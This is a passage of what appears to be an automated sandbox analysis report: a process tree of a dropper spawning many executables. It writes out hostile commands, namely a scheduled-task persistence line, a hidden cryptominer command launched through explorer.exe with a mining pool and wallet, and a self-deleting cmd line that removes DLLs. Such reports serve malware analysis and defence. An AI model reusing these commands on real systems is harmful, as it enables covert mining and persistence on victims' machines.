        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kpaumghk.veu\autosubplayer.exe /S & exit
        9⤵
        
        PID:6904
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11f251db82fb7b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1540
    - - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11f251db82fb7b.exe
        
        Tue11f251db82fb7b.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3796
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        
        PID:4300
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        
        PID:4392
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:2268
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:4220
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        
        PID:5728
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:5100
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:4492
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        
        PID:4436
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:7604
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        
        PID:4520
        
        C:\Users\Admin\AppData\Roaming\7431108.exe
        
        "C:\Users\Admin\AppData\Roaming\7431108.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4100
        
        C:\Users\Admin\AppData\Roaming\7213334.exe
        
        "C:\Users\Admin\AppData\Roaming\7213334.exe"
        8⤵
        Executes dropped EXE
        
        PID:4300
        
        C:\Users\Admin\AppData\Roaming\1865374.exe
        
        "C:\Users\Admin\AppData\Roaming\1865374.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4732
        
        C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"
        7⤵
        Executes dropped EXE
        
        PID:4580
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Alfanewfile2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe" & del C:\ProgramData\*.dll & exit
        8⤵
        
        PID:5848
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Alfanewfile2.exe /f
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4716
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        9⤵
        Delays execution with timeout.exe
        
        PID:4812
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4656
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4656 -s 1532
        8⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:3972
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        Executes dropped EXE
        
        PID:4840
        
        C:\Users\Admin\AppData\Local\Temp\is-6T1AC.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-6T1AC.tmp\setup_2.tmp" /SL5="$50148,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4932
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        Executes dropped EXE
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        
        PID:4720
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 804
        8⤵
        Program crash
        
        PID:4732
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 820
        8⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:4988
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 864
        8⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:2208
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 932
        8⤵
        Program crash
        
        PID:4232
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 1016
        8⤵
        Program crash
        
        PID:5412
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 820
        8⤵
        Program crash
        
        PID:5556
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 1332
        8⤵
        Program crash
        
        PID:6028
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 1396
        8⤵
        Program crash
        
        PID:6048
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 1324
        8⤵
        Executes dropped EXE
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:4520
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        Executes dropped EXE
        
        PID:4976
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        
        PID:5512
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        
        PID:4128
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4820
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue1109eec571ac.exe /mixone
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3704
    - - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue1109eec571ac.exe
        
        Tue1109eec571ac.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:3620
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 656
        6⤵
        Program crash
        
        PID:4716
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 672
        6⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:4800
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 628
        6⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:4772
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 672
        6⤵
        Program crash
        
        PID:4684
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 888
        6⤵
        Program crash
        
        PID:5632
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 892
        6⤵
        Program crash
        
        PID:5800
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 1156
        6⤵
        Program crash
        
        PID:3812
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 1148
        6⤵
        Program crash
        
        PID:4936
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11bc0507b56295.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4056
    - - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11bc0507b56295.exe
        
        Tue11bc0507b56295.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:628
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11e4e580f2e8141a3.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3268
    - - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        Tue11e4e580f2e8141a3.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4060
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:4292
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5084
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:4452
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:4572
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5148
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5684
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4576
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5736
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5436
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1500
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 24
        7⤵
        Program crash
        
        PID:5636
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5624
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5636
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5732
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5252
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6472
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6800
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5520
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:976
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6844
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6196
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1824
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6740
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7380
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7912
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8144
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7372
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7504
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7988
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5580
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7368
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4876
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4392
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7596
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5680
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8064
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8188
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5108
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8184
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5840
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7188
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5320
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1164
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3960
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7316
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7344
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4144
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7192
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4140
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2796
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7140
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6012
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6756
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6856
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1496
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7412
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7416
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1324
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4304
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7740
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8004
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5100
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2308
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7652
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7728
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7692
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5380
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5180
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6164
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5040
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8068
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5236
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3936
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5032
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6380
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7172
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6388
      - C:\Users\Admin\AppData\Local\Temp\7zSC2CB17C4\Tue11e4e580f2e8141a3.exe
        
